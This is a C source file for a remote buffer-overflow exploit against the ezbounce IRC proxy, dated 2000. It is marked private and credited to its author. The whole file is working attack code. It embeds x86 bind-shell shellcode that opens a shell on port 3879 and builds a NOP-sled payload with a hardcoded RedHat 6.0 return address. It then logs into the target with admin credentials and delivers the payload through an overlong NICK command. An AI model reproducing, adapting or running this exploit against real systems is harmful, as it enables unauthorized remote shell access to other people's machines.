/* ezbounce version (0.85.2 and probably others) exploit by sectorx
 * mad thanks to duke for helping me with the segment probe code :)
 * I included the offset of RedHat 6.0's RPM, feel free to report me of
 * any other offsets of precompiled binaries.
 * 
 * PRIVATE! DO NOT DISTRIBUTE!!
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <fcntl.h>
#include <stdarg.h>
#include <time.h>
#include <sys/time.h>

#define MAX      4096
#define TIMEOUT  1
#define SIZE     400
#define TOP      310
#define ADDR     0xbffff26c   /* ezbounce 0.85.2 RedHat 6.0 RPM offset */

/* bind a shell on port 3879 by lamagra */
char shellcode[]=
"\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
"\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
"\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0"
"\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
"\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
"\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"
"\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
"\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";

int Connect(int ip, int port)
{
   int fd;
   struct sockaddr_in a;
   
   fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
   if (fd<0) return -1;
   a.sin_family = AF_INET;
   a.sin_port = htons(port);
   a.sin_addr.s_addr = ip;
   if (connect(fd,(struct sockaddr*)&a,sizeof(struct sockaddr))<0) return -1;
   return fd;
}

int sprint(int fd, const char *str, ...)
{
   va_list args;
   char buf[MAX];
   
   va_start(args,str);
   vsnprintf(buf,MAX,str,args);
   printf("-> %s",buf);
   return(write(fd,buf,strlen(buf)));
}

int Datawatch(int fd, int sec)
{
   fd_set fds;
   struct timeval tv;
   
   tv.tv_sec = sec;
   tv.tv_usec = 0;
   FD_ZERO(&fds);
   FD_SET(fd,&fds);
   if (select(fd+1,&fds,NULL,NULL,&tv)) return 1;
   return 0;
}

int Get(int fd, char *grep)
{
   char buf[MAX];
   int ret=0;
   
   while (Datawatch(fd,TIMEOUT)>0) {
      memset(&buf,0,sizeof(buf));
      read(fd,&buf,sizeof(buf));
      if (strstr(buf,grep)) ++ret;
   }
   return ret;
}

int main(int argc, char *argv[])
{
   int i,fd;
   char buf[SIZE];
   
   printf("ezbounce remote exploit by sectorx of xor\n");
   if (argc<6) {
      printf("Usage: %s <ip> <port> <password> <admin username> <admin password>\n\n",argv[0]);
      return;
   }
   
   memset(&buf,0x90,sizeof(buf));
   for (i=TOP+2;i<SIZE-4;i+=4) *(long*)&buf[i] = ADDR;
   memcpy(buf+(TOP-sizeof(shellcode)-1),shellcode,sizeof(shellcode));
   buf[TOP-2] = 0x90;
   buf[SIZE-1] = '\0';
   
   fd = Connect(inet_addr(argv[1]),atoi(argv[2]));
   if (fd<0) {
      perror("Connect ");
      return;
   }
   sprint(fd,"USER xor\n");
   sprint(fd,"NICK %s\n",buf);
   sprint(fd,"PASS %s\n",argv[3]);
   Get(fd,"NOTICE");
   sprint(fd,"ADMIN %s %s\n",argv[4],argv[5]);
   if (Get(fd,"granted")==0) {
      printf("** Error: i was unable to gain administrative privilages using provided l/p\naborting.\n");
      goto end;
   }
   sprint(fd,"WRITE all a\n");
   printf("Code sent! telnet to port 3879 for shell\n");
   end: ;
   close(fd);
}
/*                   www.hack.co.za   [28 September 2000]*/